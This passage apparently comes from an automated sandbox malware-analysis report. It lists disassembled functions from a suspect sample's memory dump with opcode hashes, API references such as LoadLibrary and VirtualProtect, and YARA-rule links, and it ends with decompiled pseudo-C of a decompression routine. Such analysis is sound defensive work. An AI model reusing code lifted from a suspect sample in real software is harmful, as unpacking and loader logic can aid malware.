                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 02F49621 Relevance: 1.5, Strings: 1, Instructions: 241COMMON
                                                                                      Download Yara Rule
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000001.00000002.26210459102.0000000002F40000.00000040.00000001.00040000.00000008.sdmp, Offset: 02F40000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_1_2_2f40000_xcVh7ZmH4Y.jbxd
                                                                                      Yara matches
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: [o
                                                                                      • API String ID: 0-1618177226
                                                                                      • Opcode ID: da132a3b567e229d0432ae57975697db0070bd6163c798ffb5186dca777a8317
                                                                                      • Instruction ID: f56397f0068c2b1d130c5e01e4cf5e44c4519ec8b32cd9989db60a6b0847bec4
                                                                                      • Opcode Fuzzy Hash: da132a3b567e229d0432ae57975697db0070bd6163c798ffb5186dca777a8317
                                                                                      • Instruction Fuzzy Hash: 778148727047898FDF308E29D9A43DB37A2EF963A0F54822ECD4A9F285D7B14941CB51
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 02F49786 Relevance: 1.5, Strings: 1, Instructions: 241COMMON
                                                                                      Download Yara Rule
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000001.00000002.26210459102.0000000002F40000.00000040.00000001.00040000.00000008.sdmp, Offset: 02F40000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_1_2_2f40000_xcVh7ZmH4Y.jbxd
                                                                                      Yara matches
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: [o
                                                                                      • API String ID: 0-1618177226
                                                                                      • Opcode ID: cf504ad3e1f800f64445bf6f358c872927fbd934c51ff8982ccc27ddf4d6f6bd
                                                                                      • Instruction ID: 8411ea3b4b339f9655de9a5dd779f57e8bbcf3b0d05598887ba8be0e29f95771
                                                                                      • Opcode Fuzzy Hash: cf504ad3e1f800f64445bf6f358c872927fbd934c51ff8982ccc27ddf4d6f6bd
                                                                                      • Instruction Fuzzy Hash: DC8147727043898FDB348E29DDA43DB37A2EF953A0F64822ECD4A9B285D7B14941CB51
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 02F498ED Relevance: 1.5, Strings: 1, Instructions: 233COMMON
                                                                                      Download Yara Rule
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000001.00000002.26210459102.0000000002F40000.00000040.00000001.00040000.00000008.sdmp, Offset: 02F40000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_1_2_2f40000_xcVh7ZmH4Y.jbxd
                                                                                      Yara matches
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: [o
                                                                                      • API String ID: 0-1618177226
                                                                                      • Opcode ID: dcbd9e4ca79bf07c04c4ecf14d5f7b89271874afa8cb4eb94d480edf0e6b95be
                                                                                      • Instruction ID: f491fd5e1d2762bad436f155a92ad4f76df41d56b8c76e565dba4f7a6458820c
                                                                                      • Opcode Fuzzy Hash: dcbd9e4ca79bf07c04c4ecf14d5f7b89271874afa8cb4eb94d480edf0e6b95be
                                                                                      • Instruction Fuzzy Hash: 6F8149727043898FDF348E29D9A43DB37A2EF953E0F54822ECD4A9B285D7B14941CB51
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 02F496C9 Relevance: 1.5, Strings: 1, Instructions: 232libraryCOMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • LoadLibraryA.KERNEL32(?,?,?,02F45CD3,-213C6C70,02F52D38,00000000), ref: 02F54889
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000001.00000002.26210459102.0000000002F40000.00000040.00000001.00040000.00000008.sdmp, Offset: 02F40000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_1_2_2f40000_xcVh7ZmH4Y.jbxd
                                                                                      Yara matches
                                                                                      Similarity
                                                                                      • API ID: LibraryLoad
                                                                                      • String ID: [o
                                                                                      • API String ID: 1029625771-1618177226
                                                                                      • Opcode ID: f42c4ecb9da45b1b312f8af4d359f4c5563f71e08a172af89b3c17a4b535c860
                                                                                      • Instruction ID: 65ac3e22da83beffefd9587cde6e40bf29763317b399acd0d996132997e60b3b
                                                                                      • Opcode Fuzzy Hash: f42c4ecb9da45b1b312f8af4d359f4c5563f71e08a172af89b3c17a4b535c860
                                                                                      • Instruction Fuzzy Hash: 6C8158727043898FDF348E29D9A43DB37A2EF963E0F54822ECD4A9B285D7B14941CB51
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 02F4DA82 Relevance: 1.5, Strings: 1, Instructions: 216COMMON
                                                                                      Download Yara Rule
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000001.00000002.26210459102.0000000002F40000.00000040.00000001.00040000.00000008.sdmp, Offset: 02F40000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_1_2_2f40000_xcVh7ZmH4Y.jbxd
                                                                                      Yara matches
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: /O(}
                                                                                      • API String ID: 0-3510241698
                                                                                      • Opcode ID: ec51e4873e56cb087c35a38d2b98fbc84edf40a4737b2bb9ae67093ddb0dcb0e
                                                                                      • Instruction ID: e80f255a5f73c1b215fa76180a148feb30fdcbb0f61b2f4928f1004e3cbe511a
                                                                                      • Opcode Fuzzy Hash: ec51e4873e56cb087c35a38d2b98fbc84edf40a4737b2bb9ae67093ddb0dcb0e
                                                                                      • Instruction Fuzzy Hash: 37812272608346CFDB348E6898A43EA77B1EF953A4F65023ECC8ACB641D7724582CB01
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 02F4D9BC Relevance: 1.5, Strings: 1, Instructions: 209COMMON
                                                                                      Download Yara Rule
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000001.00000002.26210459102.0000000002F40000.00000040.00000001.00040000.00000008.sdmp, Offset: 02F40000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_1_2_2f40000_xcVh7ZmH4Y.jbxd
                                                                                      Yara matches
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: /O(}
                                                                                      • API String ID: 0-3510241698
                                                                                      • Opcode ID: e6d281d69ed2e6aebb2bf571548115984c3a2b28bad30e6aad4ca2dd20763c5d
                                                                                      • Instruction ID: 2db3bba0b47cb9ebbc0d8ac6d89f32b20befb37f864cdc58f8000cc3e209a3db
                                                                                      • Opcode Fuzzy Hash: e6d281d69ed2e6aebb2bf571548115984c3a2b28bad30e6aad4ca2dd20763c5d
                                                                                      • Instruction Fuzzy Hash: 05812671A4834ACFCB348F25C8543EA7BB1EF96394F2A413ECC9A8B655D7714986CB01
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 02F4DB4C Relevance: 1.4, Strings: 1, Instructions: 182COMMON
                                                                                      Download Yara Rule
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000001.00000002.26210459102.0000000002F40000.00000040.00000001.00040000.00000008.sdmp, Offset: 02F40000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_1_2_2f40000_xcVh7ZmH4Y.jbxd
                                                                                      Yara matches
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: /O(}
                                                                                      • API String ID: 0-3510241698
                                                                                      • Opcode ID: 18e0558314c96d4f21324f304f7b12ec14625211c8d53d184df9d8824821951b
                                                                                      • Instruction ID: 8d1c3dbe70aadf91efd18109de157c7f283eb93ff0a3ab4e676db2b273bcd3f1
                                                                                      • Opcode Fuzzy Hash: 18e0558314c96d4f21324f304f7b12ec14625211c8d53d184df9d8824821951b
                                                                                      • Instruction Fuzzy Hash: 5D613572648346CFDB344E6899A43EA77B1FF953A4F65067ECC46CB641D7324582CB01
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 02F4E53B Relevance: 1.4, Strings: 1, Instructions: 167COMMON
                                                                                      Download Yara Rule
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000001.00000002.26210459102.0000000002F40000.00000040.00000001.00040000.00000008.sdmp, Offset: 02F40000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_1_2_2f40000_xcVh7ZmH4Y.jbxd
                                                                                      Yara matches
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: &a<O
                                                                                      • API String ID: 0-2023271191
                                                                                      • Opcode ID: a71d3ee7d2dce6e13f2b3be5ffac36f60578b616d260de00b8b6d7ee63c4e858
                                                                                      • Instruction ID: 31a467991776e96fbe1fbb96acfbf3d2fd02074b01a3db9094a16640954aebaf
                                                                                      • Opcode Fuzzy Hash: a71d3ee7d2dce6e13f2b3be5ffac36f60578b616d260de00b8b6d7ee63c4e858
                                                                                      • Instruction Fuzzy Hash: 4351E472B04345DFDF34CE699AE1BEA7AE2BF49394F14012EDA4A8B640DB716544CB02
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 02F4DC15 Relevance: 1.4, Strings: 1, Instructions: 151COMMON
                                                                                      Download Yara Rule
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000001.00000002.26210459102.0000000002F40000.00000040.00000001.00040000.00000008.sdmp, Offset: 02F40000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_1_2_2f40000_xcVh7ZmH4Y.jbxd
                                                                                      Yara matches
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: /O(}
                                                                                      • API String ID: 0-3510241698
                                                                                      • Opcode ID: 8773296a6590f31adbd7b8851b60aa8fb6284408986591840189352e450cc2fb
                                                                                      • Instruction ID: 2984fc3317785c936e162c870e50d986cf35446d060ccfc4e2a211748a9b0812
                                                                                      • Opcode Fuzzy Hash: 8773296a6590f31adbd7b8851b60aa8fb6284408986591840189352e450cc2fb
                                                                                      • Instruction Fuzzy Hash: 83513373A48346CFDB748E6889643EA77B2FFA13A4F65056ECD468B640D7324583CB01
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 02F4E1F3 Relevance: 1.4, Strings: 1, Instructions: 145COMMON
                                                                                      Download Yara Rule
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000001.00000002.26210459102.0000000002F40000.00000040.00000001.00040000.00000008.sdmp, Offset: 02F40000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_1_2_2f40000_xcVh7ZmH4Y.jbxd
                                                                                      Yara matches
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: ,<_&
                                                                                      • API String ID: 0-167712520
                                                                                      • Opcode ID: 184eeade5aead2d73a69873cc18dd48a8f7b8a3d942b4d6a0eb8bae6ac94ba77
                                                                                      • Instruction ID: 8c623d0d4aa59a20b8a52bd9f222d48b92850e81205f2fc2fe093d2308d7d70b
                                                                                      • Opcode Fuzzy Hash: 184eeade5aead2d73a69873cc18dd48a8f7b8a3d942b4d6a0eb8bae6ac94ba77
                                                                                      • Instruction Fuzzy Hash: 7D51DF75640345CFDB25DF28CAA43C67BB1FF56380F898199CD8A8F229D7748942CB12
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 02F4E5A7 Relevance: 1.4, Strings: 1, Instructions: 128COMMON
                                                                                      Download Yara Rule
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000001.00000002.26210459102.0000000002F40000.00000040.00000001.00040000.00000008.sdmp, Offset: 02F40000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_1_2_2f40000_xcVh7ZmH4Y.jbxd
                                                                                      Yara matches
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: &a<O
                                                                                      • API String ID: 0-2023271191
                                                                                      • Opcode ID: a61ccacd6876df9e91750dc382a2305e569beb27d9620bd0a436d7068f354a9d
                                                                                      • Instruction ID: 15f18c0b8111ed1b651711a4bc3ceaa6daf5dbab3ea7d5b4b187f07fb2ac5859
                                                                                      • Opcode Fuzzy Hash: a61ccacd6876df9e91750dc382a2305e569beb27d9620bd0a436d7068f354a9d
                                                                                      • Instruction Fuzzy Hash: D141E432A09745EFEB388F6499E1BE777A2BF58394F50053FDA4A8B640CB316440CB46
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 02F4E64A Relevance: 1.4, Strings: 1, Instructions: 121COMMON
                                                                                      Download Yara Rule
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000001.00000002.26210459102.0000000002F40000.00000040.00000001.00040000.00000008.sdmp, Offset: 02F40000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_1_2_2f40000_xcVh7ZmH4Y.jbxd
                                                                                      Yara matches
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: &a<O
                                                                                      • API String ID: 0-2023271191
                                                                                      • Opcode ID: 40b00484d084eec0334d0092a9d5559a68055f0c121950166b9ef29e5ee89536
                                                                                      • Instruction ID: 569b00e4c0aa15bbdf0cf8bc2b5beb6ed6e6558e6c352901db0dac4d60ad02f2
                                                                                      • Opcode Fuzzy Hash: 40b00484d084eec0334d0092a9d5559a68055f0c121950166b9ef29e5ee89536
                                                                                      • Instruction Fuzzy Hash: 41410C33A09741DFEB348F64A9E4BE6B762FB587A4F50053FDA0A87640CB366440CB46
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 02F4DCDB Relevance: 1.4, Strings: 1, Instructions: 118COMMON
                                                                                      Download Yara Rule
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000001.00000002.26210459102.0000000002F40000.00000040.00000001.00040000.00000008.sdmp, Offset: 02F40000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_1_2_2f40000_xcVh7ZmH4Y.jbxd
                                                                                      Yara matches
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: /O(}
                                                                                      • API String ID: 0-3510241698
                                                                                      • Opcode ID: 26129f322d6f924e9599f7318f7376275f1da95f9c9a2820b7dfb10e0d56f3c7
                                                                                      • Instruction ID: f378bb8cea0ffea767632ea95a662a8b23907a30bfb97a229f31f31a0125d24d
                                                                                      • Opcode Fuzzy Hash: 26129f322d6f924e9599f7318f7376275f1da95f9c9a2820b7dfb10e0d56f3c7
                                                                                      • Instruction Fuzzy Hash: 14413173648346CFEB754E6899642D97772AFA23A4FA5056FC916CBA05D7324083CF02
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 02F4A7E9 Relevance: 1.3, Strings: 1, Instructions: 88COMMON
                                                                                      Download Yara Rule
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000001.00000002.26210459102.0000000002F40000.00000040.00000001.00040000.00000008.sdmp, Offset: 02F40000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_1_2_2f40000_xcVh7ZmH4Y.jbxd
                                                                                      Yara matches
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: `
                                                                                      • API String ID: 0-1850852036
                                                                                      • Opcode ID: 0ba89caa0a3ead3272cf792abf28bcecb35f1be7de16543c6b258883ec45bbc2
                                                                                      • Instruction ID: 8bfa6184db2584e6a49669cd30c73e69eeab24c9a128ad8e590bee4b41084be3
                                                                                      • Opcode Fuzzy Hash: 0ba89caa0a3ead3272cf792abf28bcecb35f1be7de16543c6b258883ec45bbc2
                                                                                      • Instruction Fuzzy Hash: 893107735816889BEB34CE649A35BDA7B73BF907A0F51411ADD0A8F158C6325241CB46
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 02F4A7B1 Relevance: 1.3, Strings: 1, Instructions: 76COMMON
                                                                                      Download Yara Rule
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000001.00000002.26210459102.0000000002F40000.00000040.00000001.00040000.00000008.sdmp, Offset: 02F40000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_1_2_2f40000_xcVh7ZmH4Y.jbxd
                                                                                      Yara matches
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: `
                                                                                      • API String ID: 0-1850852036
                                                                                      • Opcode ID: bd4d6b6b8475e43137402cfaec88b805f43037db54d7ab8403f0c0d8aebbd93c
                                                                                      • Instruction ID: cd4754bef963bfc2ead52ecf11f9bd6d36278b67745003048f89bef6f55a5ee2
                                                                                      • Opcode Fuzzy Hash: bd4d6b6b8475e43137402cfaec88b805f43037db54d7ab8403f0c0d8aebbd93c
                                                                                      • Instruction Fuzzy Hash: E231F4729852888BEF38DE348E35BDA3B73BF94790F42801ACD0A4B218D7714342CB16
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 02F54EE4 Relevance: 1.3, Strings: 1, Instructions: 55COMMON
                                                                                      Download Yara Rule
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000001.00000002.26210459102.0000000002F40000.00000040.00000001.00040000.00000008.sdmp, Offset: 02F40000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_1_2_2f40000_xcVh7ZmH4Y.jbxd
                                                                                      Yara matches
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: m/[W
                                                                                      • API String ID: 0-2002366935
                                                                                      • Opcode ID: c0db165f4233a48efe4b890e58222ef593dd9c0002b85e9ed74e0dcec31b6a22
                                                                                      • Instruction ID: b6a9a156d208be33006c56ff8298eaa810f33123bcdbe31205eb1eaf0d7bc003
                                                                                      • Opcode Fuzzy Hash: c0db165f4233a48efe4b890e58222ef593dd9c0002b85e9ed74e0dcec31b6a22
                                                                                      • Instruction Fuzzy Hash: 15119A71A10254EFCB24DE58DDD8BD933E1BF88350F91412ADF098B261D7309A81DE24
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 02F56353 Relevance: .6, Instructions: 607COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000001.00000002.26210459102.0000000002F40000.00000040.00000001.00040000.00000008.sdmp, Offset: 02F40000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_1_2_2f40000_xcVh7ZmH4Y.jbxd
                                                                                      Yara matches
                                                                                      Similarity
                                                                                      • API ID: LibraryLoadMemoryProtectVirtual
                                                                                      • String ID:
                                                                                      • API String ID: 3389902171-0
                                                                                      • Opcode ID: f2a38cec7b34542ea0f344b2fe8eacc62a7c9ffc046c2bbd30b4010bc1539961
                                                                                      • Instruction ID: f4108eaeb90ad4d6c6edaba329bc4614727275eeb2b05b27a7efaf1e070e280e
                                                                                      • Opcode Fuzzy Hash: f2a38cec7b34542ea0f344b2fe8eacc62a7c9ffc046c2bbd30b4010bc1539961
                                                                                      • Instruction Fuzzy Hash: D2322C716087D58FDB31CF38CCA87DA7BA2AF523A0F49825ACD998F296D3318545C712
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 00406D85 Relevance: .3, Instructions: 334COMMONCrypto
                                                                                      Download Yara Rule
                                                                                      C-Code - Quality: 79%
                                                                                      			E00406D85(signed int __ebx, signed int* __esi) {
				signed int _t396;
				signed int _t425;
				signed int _t442;
				signed int _t443;
				signed int* _t446;
				void* _t448;

				L0:
				while(1) {
					L0:
					_t446 = __esi;
					_t425 = __ebx;
					if( *(_t448 - 0x34) == 0) {
						break;
					}
					L55:
					__eax =  *(__ebp - 0x38);
					 *(__ebp - 0x34) =  *(__ebp - 0x34) - 1;
					__ecx = __ebx;
					 *( *(__ebp - 0x38)) & 0x000000ff = ( *( *(__ebp - 0x38)) & 0x000000ff) << __cl;
					 *(__ebp - 0x40) =  *(__ebp - 0x40) | ( *( *(__ebp - 0x38)) & 0x000000ff) << __cl;
					 *(__ebp - 0x38) =  *(__ebp - 0x38) + 1;
					__ebx = __ebx + 8;
					while(1) {
						L56:
						if(__ebx < 0xe) {
							goto L0;
						}
						L57:
						__eax =  *(__ebp - 0x40);
						__eax =  *(__ebp - 0x40) & 0x00003fff;
						__ecx = __eax;
						__esi[1] = __eax;
						__ecx = __eax & 0x0000001f;
						if(__cl > 0x1d) {
							L9:
							_t443 = _t442 | 0xffffffff;
							 *_t446 = 0x11;
							L10:
							_t446[0x147] =  *(_t448 - 0x40);
							_t446[0x146] = _t425;
							( *(_t448 + 8))[1] =  *(_t448 - 0x34);
							L11:
							 *( *(_t448 + 8)) =  *(_t448 - 0x38);
							_t446[0x26ea] =  *(_t448 - 0x30);
							E004074F4( *(_t448 + 8));
							return _t443;
						}
						L58:
						__eax = __eax & 0x000003e0;
						if(__eax > 0x3a0) {
							goto L9;
						}
						L59:
						 *(__ebp - 0x40) =  *(__ebp - 0x40) >> 0xe;
						__ebx = __ebx - 0xe;
						_t94 =  &(__esi[2]);
						 *_t94 = __esi[2] & 0x00000000;
						 *__esi = 0xc;
						while(1) {
							L60:
							__esi[1] = __esi[1] >> 0xa;
							__eax = (__esi[1] >> 0xa) + 4;
							if(__esi[2] >= (__esi[1] >> 0xa) + 4) {
								goto L68;
							}
							L61:
							while(1) {
								L64:
								if(__ebx >= 3) {
									break;
								}
								L62:
								if( *(__ebp - 0x34) == 0) {
									goto L182;
								}
								L63:
								__eax =  *(__ebp - 0x38);
								 *(__ebp - 0x34) =  *(__ebp - 0x34) - 1;
								__ecx = __ebx;
								 *( *(__ebp - 0x38)) & 0x000000ff = ( *( *(__ebp - 0x38)) & 0x000000ff) << __cl;
								 *(__ebp - 0x40) =  *(__ebp - 0x40) | ( *( *(__ebp - 0x38)) & 0x000000ff) << __cl;
								 *(__ebp - 0x38) =  *(__ebp - 0x38) + 1;
								__ebx = __ebx + 8;
							}
							L65:
							__ecx = __esi[2];
							 *(__ebp - 0x40) =  *(__ebp - 0x40) & 0x00000007;
							__ebx = __ebx - 3;
							_t108 = __ecx + 0x4084d4; // 0x121110
							__ecx =  *_t108;
							 *(__ebp - 0x40) =  *(__ebp - 0x40) >> 3;
							 *(__esi + 0xc +  *_t108 * 4) =  *(__ebp - 0x40) & 0x00000007;
							__ecx = __esi[1];
							__esi[2] = __esi[2] + 1;
							__eax = __esi[2];
							__esi[1] >> 0xa = (__esi[1] >> 0xa) + 4;
							if(__esi[2] < (__esi[1] >> 0xa) + 4) {
								goto L64;
							}
							L66:
							while(1) {
								L68:
								if(__esi[2] >= 0x13) {
									break;
								}
								L67:
								_t119 = __esi[2] + 0x4084d4; // 0x4000300
								__eax =  *_t119;
								 *(__esi + 0xc +  *_t119 * 4) =  *(__esi + 0xc +  *_t119 * 4) & 0x00000000;
								_t126 =  &(__esi[2]);
								 *_t126 = __esi[2] + 1;
							}
							L69:
							__ecx = __ebp - 8;
							__edi =  &(__esi[0x143]);
							 &(__esi[0x148]) =  &(__esi[0x144]);
							__eax = 0;
							 *(__ebp - 8) = 0;
							__eax =  &(__esi[3]);
							 *__edi = 7;
							__eax = E0040755C( &(__esi[3]), 0x13, 0x13, 0, 0,  &(__esi[0x144]), __edi,  &(__esi[0x148]), __ebp - 8);
							if(__eax != 0) {
								L72:
								 *__esi = 0x11;
								while(1) {
									L180:
									_t396 =  *_t446;
									if(_t396 > 0xf) {
										break;
									}
									L1:
									switch( *((intOrPtr*)(_t396 * 4 +  &M004074B4))) {
										case 0:
											L101:
											__eax = __esi[4] & 0x000000ff;
											__esi[3] = __esi[4] & 0x000000ff;
											__eax = __esi[5];
											__esi[2] = __esi[5];
											 *__esi = 1;
											goto L102;
										case 1:
											L102:
											__eax = __esi[3];
											while(1) {
												L105:
												__eflags = __ebx - __eax;
												if(__ebx >= __eax) {
													break;
												}
												L103:
												__eflags =  *(__ebp - 0x34);
												if( *(__ebp - 0x34) == 0) {
													goto L182;
												}
												L104:
												__ecx =  *(__ebp - 0x38);
												 *(__ebp - 0x34) =  *(__ebp - 0x34) - 1;
												__edx =  *( *(__ebp - 0x38)) & 0x000000ff;
												__ecx = __ebx;
												__edx = ( *( *(__ebp - 0x38)) & 0x000000ff) << __cl;
												 *(__ebp - 0x40) =  *(__ebp - 0x40) | ( *( *(__ebp - 0x38)) & 0x000000ff) << __cl;
												 *(__ebp - 0x38) =  *(__ebp - 0x38) + 1;
												__ebx = __ebx + 8;
												__eflags = __ebx;
											}
											L106:
											__eax =  *(0x40a5c4 + __eax * 2) & 0x0000ffff;
											__eax = __eax &  *(__ebp - 0x40);
											__ecx = __esi[2];
											__eax = __esi[2] + __eax * 4;
											__ecx =  *(__eax + 1) & 0x000000ff;
											 *(__ebp - 0x40) =  *(__ebp - 0x40) >> __cl;
											__ebx = __ebx - ( *(__eax + 1) & 0x000000ff);
											__ecx =  *__eax & 0x000000ff;
											__eflags = __ecx;
											if(__ecx != 0) {
												L108:
												__eflags = __cl & 0x00000010;
												if((__cl & 0x00000010) == 0) {
													L110:
													__eflags = __cl & 0x00000040;
													if((__cl & 0x00000040) == 0) {
														goto L125;
													}
													L111:
													__eflags = __cl & 0x00000020;
													if((__cl & 0x00000020) == 0) {
														goto L9;
													}
													L112:
													 *__esi = 7;
													goto L180;
												}
												L109:
												__esi[2] = __ecx;
												__esi[1] = __eax;
												 *__esi = 2;
												goto L180;
											}
											L107:
											__esi[2] = __eax;
											 *__esi = 6;
											goto L180;
										case 2:
											L113:
											__eax = __esi[2];
											while(1) {
												L116:
												__eflags = __ebx - __eax;
												if(__ebx >= __eax) {
													break;
												}
												L114:
												__eflags =  *(__ebp - 0x34);
												if( *(__ebp - 0x34) == 0) {
													goto L182;
												}
												L115:
												__ecx =  *(__ebp - 0x38);
												 *(__ebp - 0x34) =  *(__ebp - 0x34) - 1;
												__edx =  *( *(__ebp - 0x38)) & 0x000000ff;
												__ecx = __ebx;
												__edx = ( *( *(__ebp - 0x38)) & 0x000000ff) << __cl;
												 *(__ebp - 0x40) =  *(__ebp - 0x40) | ( *( *(__ebp - 0x38)) & 0x000000ff) << __cl;
												 *(__ebp - 0x38) =  *(__ebp - 0x38) + 1;
												__ebx = __ebx + 8;
												__eflags = __ebx;
											}
											L117:
											 *(0x40a5c4 + __eax * 2) & 0x0000ffff =  *(0x40a5c4 + __eax * 2) & 0x0000ffff &  *(__ebp - 0x40);
											__esi[1] = __esi[1] + ( *(0x40a5c4 + __eax * 2) & 0x0000ffff &  *(__ebp - 0x40));
											__ecx = __eax;
											 *(__ebp - 0x40) =  *(__ebp - 0x40) >> __cl;
											__ebx = __ebx - __eax;
											__eflags = __ebx;
											__eax = __esi[4] & 0x000000ff;
											__esi[3] = __esi[4] & 0x000000ff;
											__eax = __esi[6];
											__esi[2] = __esi[6];
											 *__esi = 3;
											goto L118;
										case 3:
											L118:
											__eax = __esi[3];
											while(1) {
												L121:
												__eflags = __ebx - __eax;
												if(__ebx >= __eax) {
													break;
												}
												L119:
												__eflags =  *(__ebp - 0x34);
												if( *(__ebp - 0x34) == 0) {
													goto L182;
												}
												L120:
												__ecx =  *(__ebp - 0x38);
												 *(__ebp - 0x34) =  *(__ebp - 0x34) - 1;
												__edx =  *( *(__ebp - 0x38)) & 0x000000ff;
												__ecx = __ebx;
												__edx = ( *( *(__ebp - 0x38)) & 0x000000ff) << __cl;
												 *(__ebp - 0x40) =  *(__ebp - 0x40) | ( *( *(__ebp - 0x38)) & 0x000000ff) << __cl;
												 *(__ebp - 0x38) =  *(__ebp - 0x38) + 1;
												__ebx = __ebx + 8;
												__eflags = __ebx;
											}
											L122:
											__eax =  *(0x40a5c4 + __eax * 2) & 0x0000ffff;
											__eax = __eax &  *(__ebp - 0x40);
											__ecx = __esi[2];
											__eax = __esi[2] + __eax * 4;
											__ecx =  *(__eax + 1) & 0x000000ff;
											 *(__ebp - 0x40) =  *(__ebp - 0x40) >> __cl;
											__ebx = __ebx - ( *(__eax + 1) & 0x000000ff);
											__ecx =  *__eax & 0x000000ff;
											__eflags = __cl & 0x00000010;
											if((__cl & 0x00000010) == 0) {
												L124:
												__eflags = __cl & 0x00000040;
												if((__cl & 0x00000040) != 0) {
													goto L9;
												}
												L125:
												__esi[3] = __ecx;
												__ecx =  *(__eax + 2) & 0x0000ffff;
												__esi[2] = __eax;
												goto L180;
											}
											L123:
											__esi[2] = __ecx;
											__esi[3] = __eax;
											 *__esi = 4;
											goto L180;
										case 4:
											L126:
											__eax = __esi[2];
											while(1) {
												L129:
												__eflags = __ebx - __eax;
												if(__ebx >= __eax) {
													break;
												}
												L127:
												__eflags =  *(__ebp - 0x34);
												if( *(__ebp - 0x34) == 0) {
													goto L182;
												}
												L128:
												__ecx =  *(__ebp - 0x38);
												 *(__ebp - 0x34) =  *(__ebp - 0x34) - 1;
												__edx =  *( *(__ebp - 0x38)) & 0x000000ff;
												__ecx = __ebx;
												__edx = ( *( *(__ebp - 0x38)) & 0x000000ff) << __cl;
												 *(__ebp - 0x40) =  *(__ebp - 0x40) | ( *( *(__ebp - 0x38)) & 0x000000ff) << __cl;
												 *(__ebp - 0x38) =  *(__ebp - 0x38) + 1;
												__ebx = __ebx + 8;
